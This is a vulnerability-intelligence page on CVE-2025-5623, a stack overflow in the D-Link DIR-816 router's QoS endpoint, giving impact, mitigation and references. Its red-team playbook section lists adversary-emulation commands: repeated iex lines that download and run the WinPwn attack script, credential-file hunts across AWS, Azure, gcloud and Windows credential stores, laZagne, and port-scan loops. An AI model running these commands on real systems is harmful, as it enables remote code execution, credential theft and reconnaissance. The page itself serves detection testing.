CVE-2025-5623
Overview
The vulnerability is a stack-based buffer overflow caused by improper handling of input parameters dip_address and sip_address within the qosClassifier function of the /goform/qosClassifier endpoint. This flaw arises from insufficient bounds checking on these arguments, allowing overflow of the stack memory. The affected component is the QoS classification functionality in D-Link DIR-816 firmware version 1.10CNB05.
Vulnerability Description
A vulnerability was found in D-Link DIR-816 1.10CNB05. It has been classified as critical. This affects the function qosClassifier of the file /goform/qosClassifier. The manipulation of the argument dip_address/sip_address leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. This vulnerability only affects products that are no longer supported by the maintainer.
Impact
An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary code or cause a denial of service by triggering a stack-based buffer overflow via crafted requests to /goform/qosClassifier. The attack requires only network access and no user interaction, as indicated by the CVSS vector AV:N/AC:L/PR:N/UI:N. Successful exploitation can compromise device integrity, leading to full control over the affected router, impacting network security and availability.
Solution
No official patch or firmware update is available since the affected D-Link DIR-816 firmware 1.10CNB05 is no longer supported by the vendor. Users are advised to discontinue use of this device or isolate it from untrusted networks. For further details and monitoring, refer to the vulnerability entries at https://vuldb.com/?id.311109 and https://vuldb.com/?ctiid.311109 for any future updates or community mitigations.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical vulnerability has been identified in the D-Link DIR-816 router, specifically within the qosClassifier function found in the firmware version 1.10CNB05. This vulnerability is characterized by a stack-based buffer overflow that occurs when the arguments dip_address or sip_address are manipulated. The flaw allows an attacker to send specially crafted requests to the device, leading to potential arbitrary code execution. Given the nature of the vulnerability, it poses a significant risk, especially considering that the affected firmware is no longer supported by the manufacturer, leaving devices vulnerable to exploitation without any forthcoming patches or updates.
The attack vector for this vulnerability is primarily remote, allowing an attacker to exploit the device from anywhere on the internet. By sending malicious packets to the router's qosClassifier endpoint, an attacker can trigger the buffer overflow condition. This could be executed through various means, such as automated scripts or targeted attacks. Once the overflow is successfully triggered, an attacker may gain control over the device, potentially leading to unauthorized access to the network, interception of sensitive data, or even the deployment of further malicious payloads within the network environment. The ease of exploitation combined with the remote attack capability significantly increases the threat level associated with this vulnerability.
In terms of real-world impact, the exploitation of this vulnerability can have severe consequences for both individual users and organizations. For home users, compromised routers can lead to unauthorized access to personal data, including financial information and private communications. In a business context, the ramifications can be even more severe. An attacker gaining control over a network router could facilitate lateral movement within the organization, allowing them to access sensitive internal systems and data. This could result in data breaches, loss of intellectual property, and significant financial losses due to remediation efforts and potential legal liabilities. Furthermore, the public disclosure of the vulnerability heightens the risk, as it provides malicious actors with the knowledge necessary to exploit unpatched devices.
To detect and mitigate this vulnerability, organizations and individuals should first assess their network for any instances of the D-Link DIR-816 router running the affected firmware version. Regular vulnerability scans and penetration testing can help identify at-risk devices. For those still using the affected router, it is advisable to implement immediate mitigation strategies, such as isolating the device from the internet or disabling remote management features. Additionally, users should consider replacing unsupported devices with newer models that receive regular security updates. Network segmentation can also be employed to limit the potential impact of an exploit, ensuring that even if a device is compromised, the attacker’s ability to move laterally within the network is restricted.
In conclusion, the critical vulnerability present in the D-Link DIR-816 router represents a significant threat to both individual users and organizations. The combination of remote exploitability and the potential for severe consequences necessitates immediate action from users of the affected product. By understanding the technical details, potential attack vectors, and implementing robust detection and mitigation strategies, stakeholders can better protect their networks against this and similar vulnerabilities in the future.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Dlink | Dir-816 Firmware | 1.10cnb05 |
cpe:2.3:o:dlink:dir-816_firmware:1.10cnb05:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-5623 |
| vuldb.com |
GitHub CVE
vdb-entry
technical-description
|
https://vuldb.com/?id.311109 |
| vuldb.com |
GitHub CVE
signature
permissions-required
|
https://vuldb.com/?ctiid.311109 |
| vuldb.com |
GitHub CVE
third-party-advisory
|
https://vuldb.com/?submit.589224 |
| github.com |
GitHub CVE
exploit
|
https://github.com/wudipjq/my_vuln/blob/main/D-Link5/vuln_51/51.md |
| dlink.com |
GitHub CVE
product
|
https://www.dlink.com/ |